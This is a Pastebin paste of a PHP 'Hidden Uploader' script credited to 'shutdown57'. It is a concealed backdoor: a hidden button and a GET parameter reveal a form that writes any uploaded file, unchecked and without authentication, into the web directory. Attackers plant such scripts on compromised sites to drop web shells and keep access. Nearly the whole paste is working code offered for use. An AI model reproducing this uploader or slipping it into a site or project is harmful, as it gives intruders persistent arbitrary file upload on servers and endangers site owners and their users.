Advertisement
Guest User

Untitled

a guest
Oct 18th, 2019
153
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.89 KB | None | 0 0
  1. <?php
  2. echo'
  3. <style>
  4. .none{
  5. display:none;
  6. }
  7. </style>
  8. <form method="get">
  9. <input type="submit" name="up" class="none">
  10. </form>';
  11. if($_GET['up']){
  12. if(isset($_POST['btn']))
  13. {
  14. $nama= $_FILES['wos']['name'];
  15. $lokasi = $_FILES['wos']['tmp_name'];
  16. $folder="";
  17. if(move_uploaded_file($lokasi,$folder.$nama))
  18. {
  19. echo'berhasil upload file :)'; }else{
  20. echo'gagal upload file :';
  21. }
  22. }
  23. echo'
  24. <!-- Uploader Script By Alinko A.K.A shutdown57 -->
  25. <!DOCTYPE html>
  26. <html xmlns="http://www.w3.org/1999/xhtml">
  27. <head>
  28. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  29. <meta name="keywords" content="Alinko,shutdown57">
  30. <meta name="viewport" content="width=width-device,initial-scale=1">
  31. <link rel="icon" href="http://alinko.pe.hu/css/logo.png">
  32. <title>Hidden~UPLOADER</title>
  33. </head>
  34. <body>
  35. <link href="https://fonts.googleapis.com/css?family=Trade+Winds" rel="stylesheet" type="text/css"/>
  36. <center>
  37. <br><br><br><br><br><br><br>
  38. <h1>#~shutdown57 Hidden Uploader~#</h1>
  39.  
  40. <fieldset><legend> Upload Here ;</legend>
  41. <form action="" method="post" enctype="multipart/form-data">
  42. <input type="file" name="wos" />
  43. <button type="submit" name="btn" id="btn">upload !</button>
  44. </form></div>
  45. </fieldset>
  46.  
  47. <!-- INI CSS :) -->
  48. <style>
  49. body{
  50. background:#000;
  51. text-align: center;
  52. color:#00FF6D;
  53. }
  54. #kolom{
  55. color:#00FF6D;
  56. background: #333;
  57. border:2px solid #71FF00;
  58. Width:35%;
  59. Height:80px;
  60. font-family: Trade Winds;
  61.  
  62. }
  63. #btn{
  64. color:#000;
  65. background: #00ff6d;
  66. border: 0;
  67. width:100%;
  68. height:30px;
  69. }
  70. #btn:hover{
  71. transition-duration:0.4s;
  72. -o-transition-duration:0.4s;
  73. -moz-transition-duration:0.4s;
  74. -webkit-transition-duration:0.4s;
  75. background:#000;
  76. border:1px solid #00ff6d;
  77. color:#71ff00;
  78. }
  79. h1{
  80. font-family:Trade Winds;
  81. color:#333;
  82. text-shadow:0pt 0pt 10pt #00FF5D,0pt 0pt 20pt #71FF00,0pt 0pt 30pt #00FF6D;
  83. }
  84.  
  85. </style>';
  86. }
  87. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement